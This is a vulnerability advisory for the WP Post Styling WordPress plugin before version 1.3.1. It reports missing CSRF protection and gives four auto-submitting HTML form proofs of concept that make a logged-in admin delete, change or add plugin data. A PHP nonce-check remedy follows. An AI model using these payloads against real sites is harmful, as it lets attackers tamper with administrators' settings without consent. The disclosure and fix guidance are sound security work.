WordPress Plugin Vulnerabilities

WP Post Styling < 1.3.1 - Multiple CSRF

Description

The plugin does not have CSRF checks in various actions, which could allow attackers to make a logged-in admin delete the plugin's data, update its settings, add new entries, and more via CSRF attacks.

Proof of Concept

<!-- PoC 1: deletes a style library entry (delete_style=1) -->
<form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-post-styling/wp-post-styling.php" method="POST">
    <input type="text" name="delete_style" value="1">
    <input type="text" name="submit-type" value="library">
    <input type="text" name="submit" value="Yes, delete it!">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.getElementById("test")
    );
</script>


<!-- PoC 2: overwrites the plugin options (submit-type=options) -->
<form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-post-styling%2Fwp-post-styling.php" method="POST">
    <input type="text" name="jd-post-styling-screen" value="1">
    <input type="text" name="jd-post-styling-default" value="disable">
    <input type="text" name="jd-post-styling-library" value="disable">
    <input type="text" name="jd-post-styling-boxsize" value="6">
    <input type="text" name="submit-type" value="options">
    <input type="text" name="submit" value="Save WP Post Styling Options">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.getElementById("test")
    );
</script>


<!-- PoC 3: updates an existing style library entry (edit_style=1) -->
<form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-post-styling%2Fwp-post-styling.php&edit_style=1" method="POST">
    <input type="text" name="edit_style" value="1">
    <input type="text" name="jd_style_library_name" value="test">
    <input type="text" name="jd_style_library_css" value="body {color: blue}">
    <input type="text" name="jd_style_library_type" value="screen">
    <input type="text" name="submit-type" value="library">
    <input type="text" name="submit" value="Update WP Post Styling Library">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.getElementById("test")
    );
</script>


<!-- PoC 4: adds a new style library entry -->
<form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-post-styling%2Fwp-post-styling.php" method="POST">
    <input type="text" name="jd_style_library_name" value="test2">
    <input type="text" name="jd_style_library_css" value="body {color: blue}">
    <input type="text" name="jd_style_library_type" value="screen">
    <input type="text" name="submit-type" value="library">
    <input type="text" name="submit" value="Add to WP Post Styling Library">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.getElementById("test")
    );
</script>
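
One way a handler for the `submit-type` POSTs shown above can reject forged requests with WordPress's nonce API. This is an added example, not the plugin's code or its 1.3.1 patch; the `wpps_*` names, the nonce action string, and the `manage_options` capability are assumptions.

```php
<?php
// Added example: hypothetical names, not taken from the plugin.
const WPPS_NONCE_ACTION = 'wpps_admin_action'; // assumed action string
const WPPS_NONCE_FIELD  = '_wpps_nonce';       // assumed field name

/**
 * Print a hidden nonce field. Call inside every <form> on the
 * settings page (options, library add/edit, delete confirmation).
 */
function wpps_render_nonce() {
    wp_nonce_field( WPPS_NONCE_ACTION, WPPS_NONCE_FIELD );
}

/**
 * Gate for all state-changing POSTs. Returns the validated
 * submit-type ('options' or 'library'), or null when the request
 * is not a form submission this page should act on.
 */
function wpps_verified_submit_type() {
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] || ! isset( $_POST['submit-type'] ) ) {
        return null;
    }

    // Capability check first (assumed capability for a Settings page).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // Dies if the nonce is missing or invalid. A cross-site form
    // cannot supply it, because the value is bound to the logged-in
    // user's session and to WPPS_NONCE_ACTION.
    check_admin_referer( WPPS_NONCE_ACTION, WPPS_NONCE_FIELD );

    $type = sanitize_key( wp_unslash( $_POST['submit-type'] ) );
    return in_array( $type, array( 'options', 'library' ), true ) ? $type : null;
}

// The existing save/delete code would run only when the gate
// returns a non-null type, e.g.:
//   $type = wpps_verified_submit_type();
//   if ( 'library' === $type && isset( $_POST['delete_style'] ) ) { ... }
```

With this gate in place, each of the four forms above fails at `check_admin_referer()` because none of them carries the nonce field.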

Affects Plugins

Fixed in 1.3.1

Miscellaneous

Original Researcher: Daniel Ruf
Submitter: Daniel Ruf
Verified: Yes

Timeline

Publicly Published: 2022-05-31
Added: 2022-05-31
Last Updated: 2023-02-27